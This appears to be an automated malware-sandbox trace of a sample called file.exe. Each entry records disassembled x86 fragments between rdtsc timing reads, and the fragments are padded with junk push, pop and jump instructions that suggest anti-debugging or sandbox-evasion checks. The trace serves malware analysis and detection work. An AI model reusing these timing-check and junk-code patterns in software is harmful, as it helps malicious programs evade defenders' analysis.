Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2133 second address: 9E2139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E122F second address: 9E1235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEEC9 second address: 9EEED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEED2 second address: 9EEED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F14FB second address: 9F1503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F1503 second address: 9F154A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FFA70D2D1B9h 0x0000000b jmp 00007FFA70D2D1B6h 0x00000010 jmp 00007FFA70D2D1B1h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FACE6 second address: 9FAD05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA707966E1h 0x00000009 jmp 00007FFA707966DAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F378B second address: 9F37B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FFA70D2D1B9h 0x0000000e jmp 00007FFA70D2D1AAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37B9 second address: 9F37BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37BE second address: 9F37C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37C4 second address: 9F37CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37CA second address: 9F37CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A07D77 second address: A07D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A07942 second address: A07947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A20812 second address: A20816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A20816 second address: A20861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FFA70D2D1B1h 0x00000011 jl 00007FFA70D2D1A6h 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FFA70D2D1B2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A20861 second address: A2088F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FFA707966DCh 0x0000000e pushad 0x0000000f jmp 00007FFA707966E0h 0x00000014 pushad 0x00000015 popad 0x00000016 jc 00007FFA707966D6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1FEC5 second address: A1FECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1FECD second address: A1FED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1FED1 second address: A1FEDF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2004B second address: A20050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A20050 second address: A2006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2006A second address: A20091 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FFA707966DFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007FFA707966E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jbe 00007FFA707966D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2050F second address: A2051E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FFA70D2D1A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23193 second address: A23197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23479 second address: A2347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2347D second address: A234A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jns 00007FFA707966D6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2354A second address: A2356D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 nop 0x00000007 jc 00007FFA70D2D1A9h 0x0000000d sbb dh, 00000012h 0x00000010 push 00000004h 0x00000012 mov dx, 8B8Bh 0x00000016 push 672A03F7h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A237CE second address: A237D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D508 second address: 93D50C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890377 second address: 48903AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, cl 0x0000000d mov edi, 763ABA64h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFA707966E9h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890473 second address: 4890477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890477 second address: 489047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 489047D second address: 4890483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890483 second address: 48904E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFA707966DDh 0x00000015 or al, 00000046h 0x00000018 jmp 00007FFA707966E1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FFA707966E0h 0x00000024 adc ecx, 171104E8h 0x0000002a jmp 00007FFA707966DBh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C05A6 second address: 48C05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ecx 0x0000000f mov dl, 77h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C05C4 second address: 48C0620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA707966E3h 0x00000009 and eax, 35C99E5Eh 0x0000000f jmp 00007FFA707966E9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FFA707966E1h 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FFA707966DDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0620 second address: 48C0626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0626 second address: 48C062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C062A second address: 48C06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push esi 0x0000000f push edi 0x00000010 pop ecx 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], esi 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a pushfd 0x0000001b jmp 00007FFA70D2D1ACh 0x00000020 xor ecx, 1816B718h 0x00000026 jmp 00007FFA70D2D1ABh 0x0000002b popfd 0x0000002c popad 0x0000002d lea eax, dword ptr [ebp-04h] 0x00000030 jmp 00007FFA70D2D1B6h 0x00000035 nop 0x00000036 jmp 00007FFA70D2D1B0h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007FFA70D2D1B1h 0x00000042 mov di, cx 0x00000045 popad 0x00000046 nop 0x00000047 jmp 00007FFA70D2D1AAh 0x0000004c push dword ptr [ebp+08h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C06B9 second address: 48C06BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C06BD second address: 48C06C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0703 second address: 48C0718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0718 second address: 48C0775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA70D2D1B7h 0x00000008 pop eax 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [ebp-04h], 00000000h 0x00000013 jmp 00007FFA70D2D1ABh 0x00000018 mov esi, eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FFA70D2D1B4h 0x00000021 sbb si, 8FB8h 0x00000026 jmp 00007FFA70D2D1ABh 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C07C5 second address: 48C07C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C07C9 second address: 48C07E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C07E6 second address: 48C07EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C07EB second address: 48C0814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov dx, si 0x0000000d mov ah, C3h 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFA70D2D1B6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0814 second address: 48C0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA707966DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B00AB second address: 48B0113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, D3h 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FFA70D2D1B7h 0x0000000e push FFFFFFFEh 0x00000010 pushad 0x00000011 mov esi, 60E8FAFBh 0x00000016 mov ah, 4Bh 0x00000018 popad 0x00000019 push 6D0A34AAh 0x0000001e jmp 00007FFA70D2D1B8h 0x00000023 xor dword ptr [esp], 1B90AAE2h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FFA70D2D1B7h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B0113 second address: 48B013B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov dx, E216h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007FFA707966D9h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFA707966DFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B013B second address: 48B0141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B0141 second address: 48B019A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 call 00007FFA707966DEh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FFA707966DEh 0x00000016 xor si, 5098h 0x0000001b jmp 00007FFA707966DBh 0x00000020 popfd 0x00000021 mov ch, C6h 0x00000023 popad 0x00000024 mov eax, dword ptr [esp+04h] 0x00000028 jmp 00007FFA707966E2h 0x0000002d mov eax, dword ptr [eax] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B019A second address: 48B01A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B01A1 second address: 48B01A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B01A7 second address: 48B0262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FFA70D2D1AEh 0x00000011 pop eax 0x00000012 jmp 00007FFA70D2D1B0h 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFA70D2D1AEh 0x00000024 and ecx, 15125FB8h 0x0000002a jmp 00007FFA70D2D1ABh 0x0000002f popfd 0x00000030 mov ecx, 7D7F8BEFh 0x00000035 popad 0x00000036 nop 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FFA70D2D1B0h 0x0000003e sub ecx, 0CF81A18h 0x00000044 jmp 00007FFA70D2D1ABh 0x00000049 popfd 0x0000004a mov ebx, esi 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007FFA70D2D1ABh 0x00000055 adc ax, 8EDEh 0x0000005a jmp 00007FFA70D2D1B9h 0x0000005f popfd 0x00000060 mov ecx, 5A0C75A7h 0x00000065 popad 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B0262 second address: 48B0266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B0266 second address: 48B026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B026C second address: 48B02EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007FFA707966E0h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FFA707966E0h 0x00000017 push eax 0x00000018 jmp 00007FFA707966DBh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov di, DFD6h 0x00000025 pushfd 0x00000026 jmp 00007FFA707966E7h 0x0000002b sbb ah, 0000005Eh 0x0000002e jmp 00007FFA707966E9h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B02EC second address: 48B02F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B02F2 second address: 48B034B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FFA707966E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 push edx 0x00000014 mov dx, cx 0x00000017 pop esi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b call 00007FFA707966E5h 0x00000020 pop ecx 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B034B second address: 48B034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B034F second address: 48B0355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B0355 second address: 48B035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B035B second address: 48B036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B036A second address: 48B036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B036E second address: 48B0389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B0389 second address: 48B03A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B03A1 second address: 48B03BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov esi, edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B03BD second address: 48B03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B03DA second address: 48B044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [769B4538h] 0x0000000d pushad 0x0000000e mov bx, BEAEh 0x00000012 mov eax, ebx 0x00000014 popad 0x00000015 xor dword ptr [ebp-08h], eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FFA707966E7h 0x0000001f adc eax, 16F42C0Eh 0x00000025 jmp 00007FFA707966E9h 0x0000002a popfd 0x0000002b jmp 00007FFA707966E0h 0x00000030 popad 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FFA707966DCh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B044C second address: 48B0486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esp 0x0000000a jmp 00007FFA70D2D1B4h 0x0000000f mov dword ptr [esp], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA70D2D1B7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B05C1 second address: 48B05D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA707966E3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48B05D8 second address: 48B0634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d pushad 0x0000000e mov ax, FE23h 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 mov ecx, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FFA70D2D1B7h 0x00000022 jmp 00007FFA70D2D1B3h 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0185 second address: 48A01E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 call 00007FFA707966E7h 0x0000000a pushfd 0x0000000b jmp 00007FFA707966E8h 0x00000010 and esi, 315342E8h 0x00000016 jmp 00007FFA707966DBh 0x0000001b popfd 0x0000001c pop esi 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FFA707966E2h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A01E3 second address: 48A0208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 call 00007FFA70D2D1AAh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov ebx, 54FCF942h 0x00000016 popad 0x00000017 sub esp, 2Ch 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movzx eax, di 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0306 second address: 48A03A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c call 00007FFA707966DCh 0x00000011 call 00007FFA707966E2h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007FFA707966E0h 0x0000001e add ax, 7F68h 0x00000023 jmp 00007FFA707966DBh 0x00000028 popfd 0x00000029 popad 0x0000002a je 00007FFA70796882h 0x00000030 jmp 00007FFA707966E6h 0x00000035 lea ecx, dword ptr [ebp-14h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FFA707966E7h 0x0000003f rdtsc
